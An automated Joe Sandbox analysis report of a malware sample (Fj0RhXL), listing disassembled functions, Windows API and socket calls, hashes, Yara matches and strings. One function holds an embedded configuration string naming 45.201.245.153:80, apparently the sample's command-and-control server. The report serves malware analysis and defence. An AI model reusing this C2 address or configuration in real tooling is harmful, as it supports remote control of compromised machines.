                                          • _sprintf.LIBCMT ref: 6C3C830F
                                            • Part of subcall function 6C3CE9CE: _fprintf.LIBCMT ref: 6C3CEAD0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _fprintf$_sprintf$LineMovePixel__floor_pentium4
                                          • String ID: %c%3d%%$%c%d
                                          • API String ID: 134622598-1508660437
                                          • Opcode ID: dcda716aeca37690c54b9cfefb5a9962b8b790cc847f752048425b7dcf0a221c
                                          • Instruction ID: 70d93535d6b5d2ac2325d65e4ef0517d1a0e5ba78761e9dda42c32bbd06ee5f1
                                          • Opcode Fuzzy Hash: dcda716aeca37690c54b9cfefb5a9962b8b790cc847f752048425b7dcf0a221c
                                          • Instruction Fuzzy Hash: 7CB15B72B002189BCF14EFA9CC45A9DBBB9FB89308F15416AE449EB251DB31AD45CF81
                                          APIs
                                          • __CreateFrameInfo.LIBCMT ref: 03DA6F25
                                            • Part of subcall function 03D9CB93: __getptd.LIBCMT ref: 03D9CBA1
                                            • Part of subcall function 03D9CB93: __getptd.LIBCMT ref: 03D9CBAF
                                          • __getptd.LIBCMT ref: 03DA6F2F
                                            • Part of subcall function 03DA2A45: __getptd_noexit.LIBCMT ref: 03DA2A48
                                            • Part of subcall function 03DA2A45: __amsg_exit.LIBCMT ref: 03DA2A55
                                          • __getptd.LIBCMT ref: 03DA6F3D
                                          • __getptd.LIBCMT ref: 03DA6F4B
                                          • __getptd.LIBCMT ref: 03DA6F56
                                          • _CallCatchBlock2.LIBCMT ref: 03DA6F7C
                                            • Part of subcall function 03D9CC38: __CallSettingFrame@12.LIBCMT ref: 03D9CC84
                                            • Part of subcall function 03DA7023: __getptd.LIBCMT ref: 03DA7032
                                            • Part of subcall function 03DA7023: __getptd.LIBCMT ref: 03DA7040
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                          • String ID:
                                          • API String ID: 1602911419-0
                                          • Opcode ID: f87ddd21ea2d298dc02b50d7b823a1122f517e041dcca18ea003818446b6167e
                                          • Instruction ID: 9b234d2b9daeaf9f0e772950158f44b3e0744ac4eacadece7830e354aef630e6
                                          • Opcode Fuzzy Hash: f87ddd21ea2d298dc02b50d7b823a1122f517e041dcca18ea003818446b6167e
                                          • Instruction Fuzzy Hash: 451104B5C00709DFDF00EFA9C544AEEBBB0FF08314F10846AE854AB261DB389A109F60
                                          APIs
                                          • __CreateFrameInfo.LIBCMT ref: 02F137DB
                                            • Part of subcall function 02F1336B: __getptd.LIBCMT ref: 02F13379
                                            • Part of subcall function 02F1336B: __getptd.LIBCMT ref: 02F13387
                                          • __getptd.LIBCMT ref: 02F137E5
                                            • Part of subcall function 02F099DE: __getptd_noexit.LIBCMT ref: 02F099E1
                                            • Part of subcall function 02F099DE: __amsg_exit.LIBCMT ref: 02F099EE
                                          • __getptd.LIBCMT ref: 02F137F3
                                          • __getptd.LIBCMT ref: 02F13801
                                          • __getptd.LIBCMT ref: 02F1380C
                                          • _CallCatchBlock2.LIBCMT ref: 02F13832
                                            • Part of subcall function 02F13410: __CallSettingFrame@12.LIBCMT ref: 02F1345C
                                            • Part of subcall function 02F138D9: __getptd.LIBCMT ref: 02F138E8
                                            • Part of subcall function 02F138D9: __getptd.LIBCMT ref: 02F138F6
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                          • String ID:
                                          • API String ID: 1602911419-0
                                          • Opcode ID: 5408800feabe718df046e8921882716d13422771f6003ebbbee1a5a2cdc7f6c6
                                          • Instruction ID: 6ca321ad2ba00a4ce0df477238202f0185f47af76cc6600f6e53ae12db2c0516
                                          • Opcode Fuzzy Hash: 5408800feabe718df046e8921882716d13422771f6003ebbbee1a5a2cdc7f6c6
                                          • Instruction Fuzzy Hash: 4B115EB1D00209DFDF00EFA4C984AEE77B1FF04750F10806AE954AB251EB789A059F50
                                          APIs
                                          • __getptd.LIBCMT ref: 03DA34FC
                                            • Part of subcall function 03DA2A45: __getptd_noexit.LIBCMT ref: 03DA2A48
                                            • Part of subcall function 03DA2A45: __amsg_exit.LIBCMT ref: 03DA2A55
                                          • __amsg_exit.LIBCMT ref: 03DA351C
                                          • __lock.LIBCMT ref: 03DA352C
                                          • InterlockedDecrement.KERNEL32(?), ref: 03DA3549
                                          • _free.LIBCMT ref: 03DA355C
                                          • InterlockedIncrement.KERNEL32(03F51658), ref: 03DA3574
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                          • String ID:
                                          • API String ID: 3470314060-0
                                          • Opcode ID: 30da8f80f76cdd38ac58c38b5c20864cd074eb0382ed7e2fe08c6182bc5b6220
                                          • Instruction ID: 5d50ca4d1c2c5410ca2c11f78b45fff6c1b2fc7fe4c5d24482964f6a1a5f6588
                                          • Opcode Fuzzy Hash: 30da8f80f76cdd38ac58c38b5c20864cd074eb0382ed7e2fe08c6182bc5b6220
                                          • Instruction Fuzzy Hash: BC01613A901F25DBD712FB6D950475DB7A1FF04B20F48404AE850AB384DB349A41CBE1
                                          APIs
                                          • __getptd.LIBCMT ref: 02F0DADA
                                            • Part of subcall function 02F099DE: __getptd_noexit.LIBCMT ref: 02F099E1
                                            • Part of subcall function 02F099DE: __amsg_exit.LIBCMT ref: 02F099EE
                                          • __amsg_exit.LIBCMT ref: 02F0DAFA
                                          • __lock.LIBCMT ref: 02F0DB0A
                                          • InterlockedDecrement.KERNEL32(?), ref: 02F0DB27
                                          • _free.LIBCMT ref: 02F0DB3A
                                          • InterlockedIncrement.KERNEL32(034B1658), ref: 02F0DB52
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                          • String ID:
                                          • API String ID: 3470314060-0
                                          • Opcode ID: dbb2dfb5abb2ba323c2ee35f06a2e41205a4210f97769b3831599c07742b852b
                                          • Instruction ID: df9618bfa731da6bdd3c7844488eeeb992f2470f8785ecada5ab68593b017cc1
                                          • Opcode Fuzzy Hash: dbb2dfb5abb2ba323c2ee35f06a2e41205a4210f97769b3831599c07742b852b
                                          • Instruction Fuzzy Hash: 9B01A171E416159BDB10ABA49894759F761EF44BD0F410005EA04672C0C7B4AA51EFD1
                                          APIs
                                          • DeleteObject.GDI32(?), ref: 03D94892
                                          • EnterCriticalSection.KERNEL32(03DC1EA4,?,?,?,03D9483B), ref: 03D948A3
                                          • EnterCriticalSection.KERNEL32(03DC1EA4,?,?,?,03D9483B), ref: 03D948B8
                                          • GdiplusShutdown.GDIPLUS(00000000,?,?,?,03D9483B), ref: 03D948C4
                                          • LeaveCriticalSection.KERNEL32(03DC1EA4,?,?,?,03D9483B), ref: 03D948D5
                                          • LeaveCriticalSection.KERNEL32(03DC1EA4,?,?,?,03D9483B), ref: 03D948DC
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
                                          • String ID:
                                          • API String ID: 4268643673-0
                                          • Opcode ID: 011bf90119c8f32c585da67bdadad503bb9c865fcd0cc0f8450ee3c358000ccf
                                          • Instruction ID: 132bdb1f1c87eaf60e94b10ab32fffe1f39971d912b4854903d1d22cc7c2bb11
                                          • Opcode Fuzzy Hash: 011bf90119c8f32c585da67bdadad503bb9c865fcd0cc0f8450ee3c358000ccf
                                          • Instruction Fuzzy Hash: 29011EB2920252EFCB04EF6A9880445BFA8FE4971537886AEE118C7317C772C40BCF91
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03D848C1
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03D848CC
                                          • Sleep.KERNEL32(00000258), ref: 03D848D9
                                          • CloseHandle.KERNEL32(?), ref: 03D848F4
                                          • CloseHandle.KERNEL32(?), ref: 03D848FD
                                          • Sleep.KERNEL32(0000012C), ref: 03D8490E
                                            • Part of subcall function 03D83F30: GetCurrentThreadId.KERNEL32 ref: 03D83F35
                                            • Part of subcall function 03D83F30: send.WS2_32(?,03DB5318,00000010,00000000), ref: 03D83F97
                                            • Part of subcall function 03D83F30: SetEvent.KERNEL32(?), ref: 03D83FBA
                                            • Part of subcall function 03D83F30: InterlockedExchange.KERNEL32(?,00000000), ref: 03D83FC6
                                            • Part of subcall function 03D83F30: WSACloseEvent.WS2_32(?), ref: 03D83FD4
                                            • Part of subcall function 03D83F30: shutdown.WS2_32(?,00000001), ref: 03D83FEC
                                            • Part of subcall function 03D83F30: closesocket.WS2_32(?), ref: 03D83FF6
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                          • String ID:
                                          • API String ID: 1019945655-0
                                          • Opcode ID: 6e7f81ef28a7af89a6345891689cca8f80c238a41e2dc157a38427e092d61dbd
                                          • Instruction ID: 320abf1fa7b130dba72007ff7b555ba44b6f415691e0fe8b771d3f99b171deff
                                          • Opcode Fuzzy Hash: 6e7f81ef28a7af89a6345891689cca8f80c238a41e2dc157a38427e092d61dbd
                                          • Instruction Fuzzy Hash: 3CF01D772047059BC624FBA9DD84D4AF3A9AF89720B154B09E26587394CA71F901CBA0
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02F048D1
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02F048DC
                                          • Sleep.KERNEL32(00000258), ref: 02F048E9
                                          • CloseHandle.KERNEL32(?), ref: 02F04904
                                          • CloseHandle.KERNEL32(?), ref: 02F0490D
                                          • Sleep.KERNEL32(0000012C), ref: 02F0491E
                                            • Part of subcall function 02F03F50: GetCurrentThreadId.KERNEL32 ref: 02F03F55
                                            • Part of subcall function 02F03F50: send.WS2_32(?,02F17420,00000010,00000000), ref: 02F03FB6
                                            • Part of subcall function 02F03F50: SetEvent.KERNEL32(?), ref: 02F03FD9
                                            • Part of subcall function 02F03F50: InterlockedExchange.KERNEL32(?,00000000), ref: 02F03FE5
                                            • Part of subcall function 02F03F50: WSACloseEvent.WS2_32(?), ref: 02F03FF3
                                            • Part of subcall function 02F03F50: shutdown.WS2_32(?,00000001), ref: 02F0400B
                                            • Part of subcall function 02F03F50: closesocket.WS2_32(?), ref: 02F04015
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                          • String ID:
                                          • API String ID: 1019945655-0
                                          • Opcode ID: ff81f591a84bcee76622ddf0d9bf9c254bd590fd343266cfcbec6ed6d0905ea1
                                          • Instruction ID: c0f9b55cb935c651c6dbe1086bba17d92a4dd2b6df466f9a9d28b65c3c4e3070
                                          • Opcode Fuzzy Hash: ff81f591a84bcee76622ddf0d9bf9c254bd590fd343266cfcbec6ed6d0905ea1
                                          • Instruction Fuzzy Hash: 67F030767046055BC624EBA9DC84D4AF3E9AFC9760B514B09E369872D0CA74E801CBA4
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03D832E1
                                          • Sleep.KERNEL32(00000258), ref: 03D832EE
                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 03D832F6
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03D83302
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03D8330A
                                          • Sleep.KERNEL32(0000012C), ref: 03D8331B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                          • String ID:
                                          • API String ID: 3137405945-0
                                          • Opcode ID: 0b67ffb9b793e7abf2b49ec8bfc6b9cdceb65d1940ce2439d49c2fe5a7483540
                                          • Instruction ID: d6b18334030da7919eed2ef84ef13dfb7f6cbd22bc2d29cc1e91f6ba47298ae9
                                          • Opcode Fuzzy Hash: 0b67ffb9b793e7abf2b49ec8bfc6b9cdceb65d1940ce2439d49c2fe5a7483540
                                          • Instruction Fuzzy Hash: 98F01273204714AFD614ABA9DC84E56F3A8AF95734B204B0DB265D73D4CAB4E901CB60
                                          APIs
                                          • __getptd_noexit.LIBCMT ref: 6C3DAEB3
                                          • _siglookup.LIBCMT ref: 6C3DAEDA
                                          • DecodePointer.KERNEL32(D2CC993F,6C4430A8,00000020,6C3EDFDB,00000016,6C3DAACE,6C443028,00000008), ref: 6C3DAF32
                                          • __lock.LIBCMT ref: 6C3DAF59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: DecodePointer__getptd_noexit__lock_siglookup
                                          • String ID: PNv
                                          • API String ID: 2847133137-4070351811
                                          • Opcode ID: 8ea0ea2ac4ea675df911a86d77b96f6eeea0a9898177d9a487b80167d8c9088d
                                          • Instruction ID: 99ef434d189b395b2a5ad509032e0d42004022c2aa1bc605abcc66ada66bf4b1
                                          • Opcode Fuzzy Hash: 8ea0ea2ac4ea675df911a86d77b96f6eeea0a9898177d9a487b80167d8c9088d
                                          • Instruction Fuzzy Hash: 5D41B1B3A05206DBCB04DF68CA84A8CB7B8FB45319B224A59E411E7F40C736B945CF76
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _fgets$_sprintf
                                          • String ID: .;C:\Astrolog\$sedeltat.mdb$swe_deltat.mdb
                                          • API String ID: 73881602-1755570801
                                          • Opcode ID: 59ecb4a79d73c2a556112f677b2b0538bd4e7317c5157477db10c332f708fbe9
                                          • Instruction ID: aae5c90458d555d3454c3d1bfe5216906ae6fa2c1d501a6c25b081f89b34ce03
                                          • Opcode Fuzzy Hash: 59ecb4a79d73c2a556112f677b2b0538bd4e7317c5157477db10c332f708fbe9
                                          • Instruction Fuzzy Hash: 2F3159B19081155AEB108B6CDE40FE9B7B8CF1631CF2401A9D4C4D29D0EB76D9D68E11
                                          APIs
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D89C8A
                                            • Part of subcall function 03D99B04: std::exception::exception.LIBCMT ref: 03D99B19
                                            • Part of subcall function 03D99B04: __CxxThrowException@8.LIBCMT ref: 03D99B2E
                                            • Part of subcall function 03D99B04: std::exception::exception.LIBCMT ref: 03D99B3F
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D89CC2
                                            • Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99ACC
                                            • Part of subcall function 03D99AB7: __CxxThrowException@8.LIBCMT ref: 03D99AE1
                                            • Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99AF2
                                          • _memmove.LIBCMT ref: 03D89D22
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                          • String ID: invalid string position$string too long
                                          • API String ID: 1615890066-4289949731
                                          • Opcode ID: edde279050a1eaf5d12de3e604d4915dce68ca47ec9f8541870b2544ebcabf7f
                                          • Instruction ID: 2df102caa2f155fa6ef437e740533111fba3bc78a1fcd31ed0ae47d292235eee
                                          • Opcode Fuzzy Hash: edde279050a1eaf5d12de3e604d4915dce68ca47ec9f8541870b2544ebcabf7f
                                          • Instruction Fuzzy Hash: 5321A7337042109BD721FB6CE890A7AF7D9EB91664B24056FF1D2CB641C772E84083A5
                                          APIs
                                          • lstrlenW.KERNEL32(000012A0,?,?,?,?,?,02F05E77,p1:,02F1C6FE,00000000,02F1C6E0,00000000,000012A0,|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02F05D68
                                          • _memset.LIBCMT ref: 02F05D72
                                          • lstrlenW.KERNEL32(|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:,?,?,?,?,?,02F05E77,p1:,02F1C6FE,00000000,02F1C6E0,00000000,000012A0,|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02F05D7F
                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,02F05E77,p1:,02F1C6FE,00000000,02F1C6E0,00000000,000012A0,|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02F05D87
                                          Strings
                                          • |p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:, xrefs: 02F05D7A
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: lstrlen$_memset
                                          • String ID: |p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:
                                          • API String ID: 2425037729-4171861867
                                          • Opcode ID: 2b14d823233d0de01798bfad3937c11d1c653bb72ab8cb5ad0afda325f2ae37c
                                          • Instruction ID: 6521bc5ac7f629046ccfe0d812fc43270241e2d5fbcef08638d0da76d1401bff
                                          • Opcode Fuzzy Hash: 2b14d823233d0de01798bfad3937c11d1c653bb72ab8cb5ad0afda325f2ae37c
                                          • Instruction Fuzzy Hash: 39213D72F020186BCF145F55EC846AEB359FB84BA0FD1016ADE05C7240E7B259518AE0
                                          APIs
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D8AD39
                                            • Part of subcall function 03D99B04: std::exception::exception.LIBCMT ref: 03D99B19
                                            • Part of subcall function 03D99B04: __CxxThrowException@8.LIBCMT ref: 03D99B2E
                                            • Part of subcall function 03D99B04: std::exception::exception.LIBCMT ref: 03D99B3F
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D8AD57
                                          • _memmove.LIBCMT ref: 03D8AD9B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                          • String ID: invalid string position$string too long
                                          • API String ID: 3404309857-4289949731
                                          • Opcode ID: 2bdbedec2247cb65aa6e8ccac8cf6458bc2a91d7909045fa5dbbe281fb8cc46d
                                          • Instruction ID: b9cec894773bb4228671de525b13a21d9d61c8ccd5a9ec58ab84ea00498a3dcc
                                          • Opcode Fuzzy Hash: 2bdbedec2247cb65aa6e8ccac8cf6458bc2a91d7909045fa5dbbe281fb8cc46d
                                          • Instruction Fuzzy Hash: 44218C76700306AFCB14EF68E8808A9B3AAFF48219714062BE516CF651EB30F955C7A0
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 03D8539F
                                          • std::exception::exception.LIBCMT ref: 03D853D5
                                            • Part of subcall function 03D9AA16: std::exception::_Copy_str.LIBCMT ref: 03D9AA31
                                          • __CxxThrowException@8.LIBCMT ref: 03D853EA
                                            • Part of subcall function 03D9C868: RaiseException.KERNEL32(?,?,03D9AC51,?,?,?,?,?,03D9AC51,?,03DB7C00,03DC1FC0,?,?,03D98BBF,00000068), ref: 03D9C8AA
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 03D853F1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
                                          • String ID: bad locale name
                                          • API String ID: 73090415-1405518554
                                          • Opcode ID: b3ea25daa8b894d1748aa849b6be612c32ba48ce03a1546a81c4338c01e56d37
                                          • Instruction ID: c181ccdb2d11159ce29d5a8fc627c24f079f526c964633726113ec0752bf36c5
                                          • Opcode Fuzzy Hash: b3ea25daa8b894d1748aa849b6be612c32ba48ce03a1546a81c4338c01e56d37
                                          • Instruction Fuzzy Hash: 41118FB2905788DFCB21DF59C880A9EFBF8FB19610F40866FE45693740D7346608CBA5
                                          APIs
                                          • ___BuildCatchObject.LIBCMT ref: 03DA72BD
                                            • Part of subcall function 03DA7218: ___BuildCatchObjectHelper.LIBCMT ref: 03DA724E
                                          • _UnwindNestedFrames.LIBCMT ref: 03DA72D4
                                          • ___FrameUnwindToState.LIBCMT ref: 03DA72E2
                                          Strings
                                          Memory Dump Source
